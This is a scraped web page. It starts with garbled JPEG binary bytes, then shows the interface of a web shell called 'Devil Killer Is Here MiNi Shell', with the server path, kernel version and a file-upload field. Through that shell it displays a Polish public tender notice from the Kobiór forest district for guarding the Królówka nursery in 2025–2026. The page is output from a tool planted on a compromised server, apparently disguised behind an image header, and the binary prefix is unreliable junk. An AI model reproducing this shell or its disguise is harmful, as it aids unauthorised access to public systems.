JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241223/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241223/0067112201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dozorowanie i ochrona mienia na Szkółce Kontenerowej „Królówka” w Orzeszu w latach 2025 -2026. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Panstwa Państwowe Gospodarstwo Leśne &#34;Lasy Państwowe&#34; - Nadleśnictwo Kobiór</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Nadleśnictwo Kobiór</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 272536267</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Katowicka 141</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piasek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-211</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32-2188181</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kobior@katowice.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kobior.katowice.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> leśnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dozorowanie i ochrona mienia na Szkółce Kontenerowej „Królówka” w Orzeszu w latach 2025 -2026. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-13ceefcb-6fd5-4e49-b2c8-1e91aba099f7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00671122</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00360622/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Ochrona mienia na szkółce kontenerowej Królówka w okresie od 01.2025-01.2027r</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https:/josephine.proebiz.com/pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu<br/>platformy JOSEPHINE https://josephine.proebiz.com/pl/ oraz poczty elektronicznej, z zastrzeżeniem, że złożenie oferty następuje<br/>wyłącznie przy użyciu platformy JOSEPHINE. Zamawiający nie przewiduje komunikowania się z Wykonawcami w inny sposób niż<br/>przy użyciu środków komunikacji elektronicznej. https://josephine.proebiz.com/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wym.tech. i organ wysyłania i<br/>odbierania dokumentów elektronicznych, elektronicznych kopii dok. i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Reg.e korzystania z platformy JOSEPHINE https://josephine.proebiz.com/pl/, stanowiącym załącznik nr od 10<br/>do15 do SWZ. Max rozmiar plików przesyłanych wynosi 500 MB, dla komunikacji szyfrowanej 300 MB. 4. Za datę przekazania oferty<br/>przyjmuje się datę jej złożenia na platformie JOSEPHINE https://josephine.proebiz.com/pl/. Za datę przekazania wniosków,<br/>zawiadomień, dokumentów elektronicznych, świadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji<br/>przyjmuje się datę ich przekazania na adres poczty elektronicznej Zamawiającego wskazany w ust. 8 poniżej. lub złożenia na<br/>platformie JOSEPHINE https://josephine.proebiz.com/pl/ 5. Zamawiający określa niezbędne wymagania techniczne umożliwiające<br/>pracę na platformie JOSEPHINE https://josephine.proebiz.com/pl/ tj.a. Połączenie z Internetem umożliwiające prawidłowe<br/>korzystanie z sieci www.;b. Przeglądarkę internetową Microsoft Internet Explorer w wersji 11.0 i wyżej, Mozilla Firefox wwersji13.0 i<br/>wyżej c. Google Chrome;d. W celu zapewnienia płynnego uczestnictwa w systemie Josephine, przeznaczonym do elektronicznego<br/>składania ofert i elektronicznej komunikacji w zamówieniach publicznych z obowiązkowym zastosowaniem podpisu elektronicznego,<br/>należy zainstalować element ICA PKIService Host i odpowiednie akcesoria do przeglądarek internetowych Google Chrome i Mozilla<br/>Firefox. Szczegóły dotyczące instalacji i odsyłacze do pobrania komponentu i odpowiednich dodatków można znaleźć po kliknięciu<br/>przycisku &#34;Test el. podpisu&#34; lub na link htps://josephine.proebiz.com/pl/testpodpis; e. W zamówieniach publicznych, w których<br/>wymagany jest podpis elektroniczny, Wykonawca musi posiadać ważny podpis elektroniczny oparty na kwalifikowanym certyfikacie<br/>spełniającym wymagania rozporządzenia (UE) nr 910/2014 Parlamentu Europejskiego i Rady Europy oraz odpowiednich przepisów<br/>państwowych. Podpisy elektroniczne oparte na kwalifikowanym certyfikacie są wystawiane przez kwalifikowanych dostawców usług<br/>w poszczególnych państwach członkowskich UE. f. Jeżeli do komunikacji w poczcie elektronicznej w systemie JOSEPHINE<br/>wymagany jest podpis elektroniczny, komputer musi mieć zainstalowane oprogramowanie Java; g.Konieczne jest włączenie obsługi<br/>Java Script w przeglądarce internetowej i włączenie plików cookie. 6. Ofertę oraz oświadczenie, o którym mowa w cz. XII ust. 1. lit. a)<br/>SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym(e-dowód).W celu minimalizacji problemów związanych ze składaniem dokumentów w formie lub postaci<br/>elektronicznej Zamawiający zaleca elektroniczne sporządzenie oferty lub oświadczenia, o którym mowa w cz. XII ust. 1. lit. a)<br/>SWZ,,zapisanie ich w formacie PDF oraz podpisanie kwalifikowanym podpisem elektronicznym w formacie PAdES, bądź opatrzenie<br/>podpisem zaufanym lub osobistym(e-dowód). .a.Wykonawca składa ofertę za pośrednictwem platformy JOSEPHINE<br/>https://josephine.proebiz.com/pl/. W formularzu Oferty (zał. nr 1 do SWZ) Wykonawca zobowiązany jest podać adres e-mail, na<br/>którym prowadzona będzie korespondencja związana z postępowaniem. b.Oferta powinna być sporządzona w języku polskim, z<br/>zachowaniem postaci elektronicznej w formacie danych określonych w rozporządzeniu Rady Ministrów z dnia 12kwietnia 2012 r. w<br/>sprawie Krajowych Ram Interoperacyjności, minim. wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej<br/>oraz minimalnych wymagań dla systemów teleinfor. (tekst jedn.:Dz.U. z 2017 r. poz. 2247) i podpisana kwalifikowanym podpisem<br/>elektronicznym bądź podpisem zaufanym lub osobistym ( e-dowód). Sposób złożenia oferty, opisany został w Regulaminie<br/>korzystania z platformy JOSEPHINE https://josephine.proebiz.com/pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">13.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej: „RODO”, informuję, że:<br/><br/>a. Administratorem danych osobowych jest Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Kobiór.<br/>adres: 43-211 Piasek, ul. Katowicka 141 <br/>adres e-mail: kobior@katowice.lasy.gov.pl<br/>nr telefonu: 32 2188181<br/>a.	Dane osobowe przetwarzane są w celach związanych z działalnością Nadleśnictwa Kobiór wynikającą z przepisów prawa na podstawie art. 6 ust 1 lit. c RODO, tj. przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze, związanego z postępowaniem o udzielenie zamówienia zn. spr. S.270.3.2024<br/>b.	Dane osobowe mogą być ujawnione pracownikom lub współpracownikom Nadleśnictwa Kobiór, podmiotom udzielającym jej wsparcia na zasadzie zleconych usług i zgodnie z zawartymi umowami powierzenia oraz podmiotom uprawnionym na podstawie przepisów prawa.<br/>c.	Dane osobowe przechowywane będą przez okres niezbędny do wykonania obowiązujących przepisów prawa.<br/>d.	Posiada Pan/Pani następujące prawa co do swoich danych osobowych: prawo dostępu do treści swoich danych i ich sprostowania, usunięcia, ograniczenia przetwarzania, prawo do przenoszenia danych oraz prawo do wniesienia sprzeciwu wobec przetwarzania, a także prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają, iż przetwarzanie Państwa danych osobowych narusza przepisy RODO.<br/>e.	Podanie danych jest obowiązkowe w oparciu o przepisy prawa, a w pozostałym zakresie dobrowolne.<br/>2. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu<br/>obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną<br/>Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział<br/>w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.3.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są usługi dozoru i ochrony mienia Gospodarstwa Szkółkarskiego Królówka, ul. Batorego 26, 43-188 Orzesze – Woszczyce realizowane w formie bezpośredniej ochrony fizycznej wraz z dodatkowymi czynnościami monitoringu poprawności działania urządzeń szkółkarskich – w latach 2025-2026r<br/>Gospodarstwo Szkółkarskie Królówka (dalej także: „szkółka leśna” lub „szkółka kontenerowa”) obejmuje teren ogrodzony o powierzchni 16,23ha ze zlokalizowanymi na nim: budynkami - administracyjno-produkcyjnym, magazynowym, socjalnym, wiatą magazynowo-sprzętową, 5 namiotami foliowymi, rampami deszczującymi, polami produkcyjnymi, zbiornikami na wodę wraz z towarzyszącą infrastrukturą.<br/> Zamawiający szacuje realizację przedmiotu zamówienia na 13500 roboczogodzin w okresie obowiązywania umowy.<br/>Do obowiązków Wykonawcy w ramach wynagrodzenia umownego należeć będzie:<br/>A. Obowiązki podstawowe:<br/>1. Świadczenie usługi ochrony mienia oraz obiektów szkółki leśnej przez jedną osobę w dni robocze tj. od poniedziałku do<br/>piątku od godziny 15.00 jednego dnia do godziny 7.00 dnia następnego oraz w soboty, niedziele i święta całodobowo, do<br/>godziny 7.00 dnia następnego po dniu wolnym od pracy.<br/>W przypadkach wymagających realizacji usługi ochrony mienia w innych godzinach pracy niż wskazane powyżej, godziny te<br/>zostaną ustalone przez Zamawiającego, w uzgodnieniu z Wykonawcą, w terminie nie krótszym niż 12 godzin przed<br/>proponowanym terminem zmian.<br/>2. Stały monitoring całego terenu szkółki leśnej na ekranie monitora, za wyjątkiem czasu obchodu oraz nie rzadziej niż co<br/>dwie godziny realizacja obchodu, tj. obejścia wszystkich obiektów szkółki leśnej tj.: budynku administracyjnego z halą<br/>siewów, budynku magazynowego, namiotów z rampami deszczującymi, hali magazynowej, pola zraszania z rampami<br/>deszczującymi, budynku socjalnego, bramy.<br/>3. Instalacja ELEKTRONICZNEGO SYSTEMU KONTROLI PRACY PRACOWNIKÓW OCHRONY umożliwiającego<br/>elektroniczną dokumentację wykonywanych przez pracownika ochrony obchodów po trasach ustalonych przez<br/>Zamawiającego i Wykonawcę z uwzględnieniem odstępów czasowych (nie rzadziej niż co 2 godziny) oraz budynków i<br/>innych obiektów wskazanych w ust. 4 A. pkt 2<br/>4. Bezzwłoczne powiadamianie Zamawiającego oraz odpowiednich służb (Policja, Straż Pożarna, Pogotowie Ratunkowe) o<br/>wszelkich zagrożeniach dla mienia lub zdrowia ludzi oraz o zaistniałych zdarzeniach z tym związanych, które będą miały<br/>miejsce na terenie szkółki leśnej.<br/>5. Prowadzenie Księgi ochrony obiektu oraz odnotowywanie w niej każdego zdarzenia, o którym mowa w ust. 4 A. pkt. 4<br/>oraz świadczenie na rzecz Zamawiającego niezbędnej pomocy przy ustalaniu okoliczności takiego zdarzenia.<br/>B. Obowiązki dodatkowe:<br/>1. Monitoring poprawnego działania urządzeń szkółki leśnej, w tym: chłodni, urządzeń w hali siewów oraz namiotach.<br/>2. Włączanie oraz wyłączanie rampy deszczującej po wcześniejszym przeszkoleniu przez Zamawiającego oraz w odstępach<br/>czasu wskazanych przez Zamawiającego.<br/>3. Informowanie Zamawiającego o nieprawidłowościach w działaniu infrastruktury technicznej szkółki leśnej.<br/>4. W razie wystąpienia nagłych zjawisk (w tym w szczególności atmosferycznych) - kontrola szczelności ogrodzenia szkółki<br/>leśnej.<br/>5. Otwieranie oraz zamykanie 5 szt. namiotów foliowych o ustalonych przez Zamawiającego godzinach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79714000-2 - Usługi w zakresie nadzoru</p> <p class="mb-0">79715000-9 - Usługi patrolowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-13 do 2027-01-11</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Oferty będą oceniane wg poniższych kryteriów, którym przyporządkowano następujące wagi:<br/>Lp. Kryterium Znaczenie w %<br/>1 Cena łączna zamówienia(C) 60 %<br/>2 Posiadanie statusu zakładu pracy chronionej(F) 25 %<br/>3 Zatrudnienia (Z) – skierowanie do realizacji zadania pracowników posiadających wpis na listę kwalifikowanych pracowników<br/>ochrony 15 %<br/>RAZEM 100 %<br/>2. Liczba punktów przyznana każdej z ocenianych ofert obliczona zostanie wg poniższego wzoru.<br/>Lp = C + F + Z<br/>gdzie:<br/>Lp – łączna liczba punktów przyznanych ofercie<br/>C – liczba punktów przyznanych ofercie w oparciu o kryterium – cena<br/>F – liczba punktów przyznanych ofercie w oparciu o kryterium – posiadanie statusu zakładu pracy chronionej<br/>Z – liczba punktów przyznanych ofercie w oparciu o kryterium – zatrudnienie<br/>3. Za najkorzystniejszą zostanie uznana oferta spełniająca wszystkie wymagania SWZ, która uzyska najwyższą liczbę punktów<br/>obliczonych w oparciu o powyższy wzór.<br/>4. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku.<br/>5. Oferta może uzyskać maksymalnie 100 pkt, w tym:<br/>a) maksymalnie 60 pkt w kryterium cena;<br/>b) maksymalnie 25 pkt w kryterium posiadanie statusu zakładu pracy chronionej;<br/>c) maksymalnie 15 pkt w kryterium zatrudnienie.<br/>6. Sposób obliczania punktów dla każdego z kryteriów:<br/>Kryterium nr 1 – CENA ©:<br/>Ocenie podlegać będzie łączna cena brutto za przedmiotu zamówienia, która podana zostanie w formularzu oferty.<br/>Punkty dla poszczególnych ofert przyznane zostaną według następującego wzoru:<br/>C = Najniższa cena brutto spośród ofert ocenianych x 100 x 60 %<br/>Cena brutto ocenianej oferty<br/>Kryterium nr 2 – Posiadanie statusu zakładu pracy chronionej (F):<br/>Sposób obliczenia punktów dla kryterium Posiadanie statusu zakładu pracy chronionej::<br/>a) Kryterium posiadanie statusu zakładu pracy chronionej zamówienia będzie rozpatrywane na podstawie zdeklarowania tego<br/>kryterium w formularzu ofertowym potwierdzonym decyzją o nadaniu statusu zakładu pracy chronionej<br/>b) Maksymalną liczbę punktów to 25 pkt.<br/>Posiadanie statusu zakł. pracy chron,-Liczba pkt:<br/>Nie 0 pkt<br/>Tak 25 pkt<br/>F- kryterium posiadanie statusu zakładu pracy chronionej - liczba pkt<br/>3) Kryterium zatrudnienia (Z)<br/>Sposób obliczania punktów dla w/w kryterium:<br/>Z - Maksymalna ilość punktów - 15 pkt.<br/>Skierowanie do realizacji zadania pracowników wpisanych na listę kwalifikowanych pracowników ochrony- Liczba pkt:<br/>0 pracowników 0 pkt<br/>1 pracownik 5 pkt<br/>2 pracowników 10 pkt<br/>3-4 pracowników 15 pkt<br/>a) Kryterium zatrudnienie będzie rozpatrywane na podstawie zadeklarowanej ilości pracowników skierowanych do realizacji<br/>zamówienia - posiadających wpis na listę kwalifikowanych pracowników ochrony - w formul. ofert.<br/>7. Jeżeli Wykonawca złoży ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z<br/>przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty doliczy do przedstawionej w niej ceny podatek od<br/>towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami. Wykonawca, składając ofertę, zobowiązany jest<br/>poinformować Zamawiającego, czy wybór oferty będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego,<br/>wskazując nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie będzie prowadzić do jego powstania, oraz wskazując<br/>ich wartość bez kwoty podatku.<br/>8. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub<br/>kosztu i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z najniższą ceną lub najniższym kosztem, a<br/>jeżeli zostały złożone oferty o takiej samej cenie lub koszcie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych.<br/>9. Wykonawcy składając oferty dodatkowe nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">posiadanie statusu zakładu pracy chronionej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">skierownie do realizacji zadania pracowników wpisanych na liste kwalifikowanych pracowników ochrony</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określa warunki udziału w 